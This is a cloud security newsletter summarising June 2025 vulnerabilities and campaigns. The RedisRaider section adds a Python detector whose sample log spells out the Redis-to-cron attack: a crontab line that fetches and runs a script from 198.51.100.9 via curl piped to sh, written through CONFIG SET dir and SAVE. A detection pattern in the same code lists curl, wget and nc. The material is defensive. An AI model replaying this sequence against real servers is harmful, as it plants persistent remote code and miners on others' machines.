Crying Out Cloud Newsletter - June 2025

This month in cloud security: from zero-day exploits in Ivanti and Commvault to critical vulnerabilities in Langflow, Azure, and Grafana. Plus, coordinated retail attacks, RedisRaider cryptojacking, and SonicWall exploitation. Tune in to Crying Out Cloud for all the insights.

Welcome back!

This month saw a lot of action, with both newly disclosed vulnerabilities and security incidents that affected real users. We bring you the latest cloud security highlights to help you stay informed and stay secure. Here are our top picks.

  


🔍 Highlights

  

Ivanti EPMM RCE Vulnerability Chain Exploited in the Wild

On May 13th, 2025, Ivanti disclosed that Endpoint Manager Mobile (EPMM) is affected by a vulnerability chain combining an authentication bypass (CVE-2025-4427) and a post-authentication remote code execution vulnerability (CVE-2025-4428). The flaws stem from unsafe evaluation of Java Expression Language in error messages combined with misconfigured request routing, and can be exploited together to achieve unauthenticated RCE. Therefore, while neither vulnerability has been assigned critical severity on its own (their CVSS scores are 5.3 and 7.2, respectively), the chain should be treated as critical.


Ivanti has confirmed limited in-the-wild exploitation of these vulnerabilities as zero-days prior to disclosure, and Wiz can now confirm ongoing in-the-wild exploitation.


According to Wiz data, less than 1% of cloud environments have publicly exposed resources vulnerable to this chain.

Learn more ❯

  


🐞 High Profile Vulnerabilities

  

RCE Vulnerability in Langflow Exploited in the Wild

CVE-2025-3248, a critical remote code execution (RCE) vulnerability in the Langflow open-source platform, is now under active exploitation and has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. The flaw, assigned a CVSS of 9.8, allows unauthenticated attackers to execute arbitrary code through a vulnerable API endpoint and poses a severe risk to exposed instances.


According to Wiz data, less than 1% of cloud environments have resources vulnerable to CVE-2025-3248.

Learn more ❯

  

Zero-Day Vulnerability in Commvault

  

Commvault has confirmed that a nation-state actor exploited CVE-2025-3928 as a zero-day to breach its Microsoft Azure environment. Some reports identified the attacker as Silk Typhoon. While the intrusion affected a limited number of customers shared with Microsoft, the company emphasized that there was no unauthorized access to customer backup data and no material impact on its services.


According to Wiz data, 7% of cloud environments have resources vulnerable to CVE-2025-3928.

Learn more ❯

  

Critical Vulnerabilities in Azure Cloud Services

  

Microsoft disclosed three critical vulnerabilities affecting core cloud services, assigned CVE-2025-29813, CVE-2025-29972 and CVE-2025-29827. One of them, CVE-2025-29813, is a pipeline token hijacking vulnerability that received the maximum CVSS score of 10.0. No exploitation has been observed in the wild, and because the issues were fixed on the service side, no customer action is required.

Learn more ❯

  

High-Severity XSS Vulnerability in Grafana

  

Grafana has released emergency security patches addressing CVE-2025-4123, a high-severity cross-site scripting (XSS) vulnerability affecting multiple supported versions of Grafana OSS and Grafana Enterprise. The flaw allows an attacker to redirect users to a malicious site and execute arbitrary JavaScript in the context of the Grafana session.


According to Wiz data, 23% of cloud environments have publicly exposed resources vulnerable to CVE-2025-4123.

Learn more ❯

  

🔒 Security Incidents & Campaigns

  

Coordinated Attacks on UK Retail Sector by Scattered Spider and DragonForce

  

A coordinated wave of cyberattacks has disrupted operations at major UK retailers, including Marks & Spencer (M&S), Co-op, and Harrods. The attacks have been linked to threat actors associated with Scattered Spider and the DragonForce ransomware operator, leveraging social engineering and ransomware deployment.

Learn more ❯

  

RedisRaider Linux Cryptojacking Campaign Targets Redis Servers

  

Researchers uncovered a Linux-based cryptojacking campaign dubbed RedisRaider, which targets publicly exposed and misconfigured Redis servers. The campaign abuses legitimate Redis commands to write malicious cron jobs that deploy a heavily obfuscated XMRig miner, and pairs this with anti-forensics tactics and web-based mining infrastructure to generate illicit Monero revenue.
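The "legitimate Redis commands" in that abuse pattern are the classic CONFIG SET dir / CONFIG SET dbfilename / SET / SAVE sequence that turns an RDB dump into a crontab file. The detector below is an added example (not RedisRaider research output or Wiz tooling) that flags this sequence per client in `redis-cli MONITOR` output or any command audit log of the same shape. The MONITOR excerpt, IP addresses and URL in `SAMPLE_MONITOR` are constructed for the example.

```python
"""Flag the Redis-to-cron write pattern in Redis command traffic.

Added example, not code from the campaign write-up. Input is the line shape
produced by `redis-cli MONITOR`:  <unix-ts> [<db> <client-addr>] "ARG" "ARG" ...
"""
import re
from collections import defaultdict

MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$')
ARG_RE = re.compile(r'"((?:\\.|[^"\\])*)"')          # one quoted MONITOR argument
_ESC = {"n": "\n", "r": "\r", "t": "\t", '"': '"', "\\": "\\"}

# Cron locations. A Redis RDB dump has no legitimate reason to land here.
CRON_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly",
             "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly")

# A crontab entry: five schedule fields (or an @-alias), then the command.
CRON_LINE_RE = re.compile(
    r'(?:^|\n)[ \t]*(?:(?:[\d*,/-]+[ \t]+){5}|@(?:reboot|hourly|daily|weekly|monthly)[ \t]+)'
    r'(?P<cmd>[^\n]+)')
# Fetch-and-run / shell spawning, which is what a dropper's cron line does.
EXEC_RE = re.compile(r'\b(?:curl|wget|sh|bash|python\d?|perl|nc)\b')


def _unescape(s):
    """Undo the backslash escapes MONITOR applies inside quoted arguments."""
    return re.sub(r'\\(.)', lambda m: _ESC.get(m.group(1), m.group(0)), s)


def parse_line(line):
    """Return (client_addr, [args]) for a MONITOR line, or None for anything else."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group(3), [_unescape(a) for a in ARG_RE.findall(m.group(4))]


def in_cron_dir(path):
    p = path.rstrip("/")
    return any(p == d or p.startswith(d + "/") for d in CRON_DIRS)


def looks_like_cron_payload(value):
    m = CRON_LINE_RE.search(value)
    return bool(m and EXEC_RE.search(m.group("cmd")))


def detect(lines):
    """Return (client, severity, detail) alerts in the order seen, tracking state per client."""
    state = defaultdict(lambda: {"dir": None, "payload": False})
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd, st = args[0].upper(), state[client]
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            param, value = args[2].lower(), args[3]
            if param == "dir" and in_cron_dir(value):
                st["dir"] = value
                alerts.append((client, "suspicious", f"RDB dir redirected to cron location {value}"))
            elif param == "dbfilename" and st["dir"]:
                alerts.append((client, "suspicious", f"RDB filename set to {value} under {st['dir']}"))
        elif cmd == "SET" and len(args) >= 3 and looks_like_cron_payload(args[2]):
            st["payload"] = True
            alerts.append((client, "suspicious", f"crontab-shaped value stored in key {args[1]!r}"))
        elif cmd in ("SAVE", "BGSAVE") and st["dir"]:
            # The dump is written only now; with a cron-shaped value in the
            # dataset this is a dropped crontab, otherwise still an anomaly.
            sev = "critical" if st["payload"] else "high"
            alerts.append((client, sev, f"{cmd} wrote dataset into {st['dir']}"))
    return alerts


# Constructed MONITOR excerpt: one client drops a crontab via Redis, another is benign.
SAMPLE_MONITOR = r'''OK
1716200001.000001 [0 203.0.113.7:41822] "INFO" "server"
1716200002.000002 [0 203.0.113.7:41822] "FLUSHALL"
1716200003.000003 [0 203.0.113.7:41822] "SET" "x" "\n\n*/1 * * * * root curl -fsSL http://198.51.100.9/x.sh | sh\n\n"
1716200004.000004 [0 203.0.113.7:41822] "CONFIG" "SET" "dir" "/var/spool/cron/"
1716200005.000005 [0 203.0.113.7:41822] "CONFIG" "SET" "dbfilename" "root"
1716200006.000006 [0 203.0.113.7:41822] "SAVE"
1716200007.000007 [0 10.0.0.12:55010] "GET" "session:abc"
1716200008.000008 [0 10.0.0.12:55010] "CONFIG" "SET" "dir" "/var/lib/redis"
'''

if __name__ == "__main__":
    for client, sev, detail in detect(SAMPLE_MONITOR.splitlines()):
        print(f"{sev:10} {client:22} {detail}")
```

Run against the sample, the benign client that points `dir` at `/var/lib/redis` produces nothing, while the attacker's client escalates from three "suspicious" stage alerts to a "critical" on the `SAVE`. On a real host, feed it `redis-cli MONITOR` (or protect the server instead: bind to localhost, enable `protected-mode`, set `requirepass`, and rename or disable `CONFIG`, which removes the primitive this whole chain relies on).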

Learn more ❯

  

SonicWall SMA Vulnerabilities Exploited in the Wild

  

Researchers have confirmed active exploitation of two SonicWall SMA100 vulnerabilities: CVE-2024-38475, a pre-authentication arbitrary file read in the Apache HTTP Server's mod_rewrite module shipped on the appliance, and CVE-2023-44221, a post-authentication command injection. When chained, the file read exposes administrator session tokens, which the attacker then uses to reach the command injection, so an unauthenticated attacker can remotely execute commands and fully compromise the appliance. Both vulnerabilities have been added to CISA's Known Exploited Vulnerabilities (KEV) catalog.

Learn more ❯

  


🎧 Hold on to your headphones!

  

Tune in to "Crying Out Cloud", our monthly cloud security news roundup podcast, hosted by the talented duo Eden Naftali and Amitai Cohen.

  
Listen on Spotify and Apple Podcasts.